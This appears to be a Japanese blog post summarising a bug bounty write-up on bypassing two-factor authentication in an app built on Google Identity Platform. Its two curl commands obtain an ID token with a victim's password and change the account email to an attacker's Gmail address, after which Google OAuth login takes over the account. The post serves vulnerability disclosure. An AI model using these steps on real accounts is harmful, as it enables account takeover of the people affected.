Hello there, ('ω')ノ

 

Google ID と OAuth ログインによる 2FA バイパスを。

 

脆弱性：

　2FA バイパス

　アカウント乗っ取り

 

記事：

　https://medium.com/@sharp488/2fa-bypass-via-google-identity-oauth-login-6c991ac837af

 

今回は、プライベート プログラムで見つけた別の 2FA バイパスに関するもので。

アプリケーションは、認証にサードパーティのサービスを使用していて。

この場合は、Identity Platform と呼ばれる Google Cloud Platform サービスで。

認証後、アプリケーションはユーザーを 2FA 検証ページにリダイレクトして。

以下に示す curl コマンドを使用すると、攻撃者は 2FA 対応アカウントの。

ID トークンを取得できて。

 

IDトークンを取得：

curl ‘https://identitytoolkit.googleapis.com/v1/accounts:signInWithPassword?key=AIzaSr5kAE4GhcjsiwkNSks7sKSNbajsHn-SDk8' \
-H ‘Content-Type: application/json’ \
--data-binary ‘{“email”:”victim@wearehackerone.com”,”password”:”pass@1234",”returnSecureToken”:true}’

 

 

攻撃者がトークンを取得すると、被害者のアカウントの電子メールを。

攻撃者の電子メール ID に更新できて。

攻撃者は、2FA をバイパスするために使用される Gmail ID でそれを更新して。

 

メールの更新：

curl ‘https://identitytoolkit.googleapis.com/v1/accounts:update?key=AIzaSr5kAE4GhcjsiwkNSks7sKSNbajsHn-SDk8' \

-H ‘Content-Type: application/json’ \

--data-binary \

‘{“idToken”:”eyJhbGciOiJSUzI1NiIsImtpZCI6IjA2M2E3Y2E0M2MzYzc2MDM2NzRlZGE0YmU5NzcyNWI3M2QwZGMwMWYiLCJ0eXAiOiJKV1.eyJyTRHsasdhasdjhsakdhaksjdaskjdsakdnkkcnm-wqe7qw909231kjSAHYnAjdlkjlksajdAHkhjbbqjksapOkJlkjqwejqwlknebnasdbasdbksagdjhvqwjkeqwgufebsadkjbsakajshd7qw86wqdehjkwqt521kKLWSJDLAjdja;sdjas;dj;sajdlasjd;kajsd.DbRLQU1bhwWOMQ9e-6IPb4VJmMMLdepYxP85OwQ5jX9PGw200Wl7GypNvDSXWqK0ArdcoQnLfOB-q00u03R1GGjalFgkAJSRdX9yQDZThwUKKXPQRvJBcKTuYpMesXY5UlI-m0UfOP-RjWWFi_TVvbFDmC9kuhutQ3_FmJs7HUq0Rj0TzagjrHBuXf9zDCoxvoIoyKjee9RvtPcrPUK8o1xs8hs7SNX9ioKoe4VLeAFVTEn8YiAQS-VqnnCe64yPjhV4sAvuJ1uDGA-_z-IMRJO9aJ7f0jTmU-WNzIRwQlTEgCOeWONkwHe-qJSX2Ph1z9QQRyEsoaDLgIuOw9lciw”,”email”:”attacker@gmail.com”,”returnSecureToken”:true}’

 

電子メール ID を更新した後、攻撃者は、アプリケーションが。

提供する代替ログイン方法である Google OAuth オプションを認証に使用して。

攻撃者は「attacker@gmail.com」とそのパスワードを使用してログインし。

被害者のアカウントへのフル アクセスを許可するので。

2FA 実装は正常にバイパスされて。

 

攻撃者は被害者のアカウントに完全にアクセスできるため。

深刻度の高いバグとしてトリアージされて。

 

Best regards, (^^ゞ